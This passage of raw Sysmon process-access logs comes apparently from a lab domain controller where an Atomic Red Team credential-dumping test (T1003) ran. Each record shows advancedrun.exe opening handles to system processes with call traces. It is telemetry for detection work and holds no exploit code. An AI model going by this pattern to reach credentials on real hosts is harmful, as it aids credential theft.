YSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003967325Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.300{834264DD-F282-61EA-2004-000000002702}988296C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-2F00-000000002702}2440C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003967323Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.300{834264DD-F282-61EA-2004-000000002702}988296C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF4-61EA-2D00-000000002702}2988C:\Windows\System32\spoolsv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003967322Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.300{834264DD-F282-61EA-2004-000000002702}988296C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF2-61EA-2C00-000000002702}2896C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003967320Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.300{834264DD-F282-61EA-2004-000000002702}988296C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF2-61EA-2B00-000000002702}2888C:\Users\Public\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003967319Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.300{834264DD-F282-61EA-2004-000000002702}988296C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF0-61EA-2900-000000002702}2760C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003967318Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.300{834264DD-F282-61EA-2004-000000002702}988296C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE8-61EA-2000-000000002702}1516C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003967317Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.300{834264DD-F282-61EA-2004-000000002702}988296C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1800-000000002702}1384C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000003967316Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.300{834264DD-F282-61EA-2004-000000002702}988296C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1700-000000002702}1300C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003967315Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.300{834264DD-F282-61EA-2004-000000002702}988296C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1600-000000002702}1264C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000003967312Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.285{834264DD-F282-61EA-2004-000000002702}988296C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1500-000000002702}1064C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003967311Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.285{834264DD-F282-61EA-2004-000000002702}988296C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1400-000000002702}352C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000003967309Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.285{834264DD-F282-61EA-2004-000000002702}988296C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1300-000000002702}832C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000003967308Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.285{834264DD-F282-61EA-2004-000000002702}988296C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1200-000000002702}820C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorWindow Manager\DWM-1 10341000x80000000000000003967307Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.285{834264DD-F282-61EA-2004-000000002702}988296C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1100-000000002702}488C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003967306Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.285{834264DD-F282-61EA-2004-000000002702}988296C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1000-000000002702}92C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003967305Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.285{834264DD-F282-61EA-2004-000000002702}988296C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-0F00-000000002702}364C:\Windows\system32\LogonUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003967304Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.285{834264DD-F282-61EA-2004-000000002702}988296C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE6-61EA-0E00-000000002702}932C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003967303Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 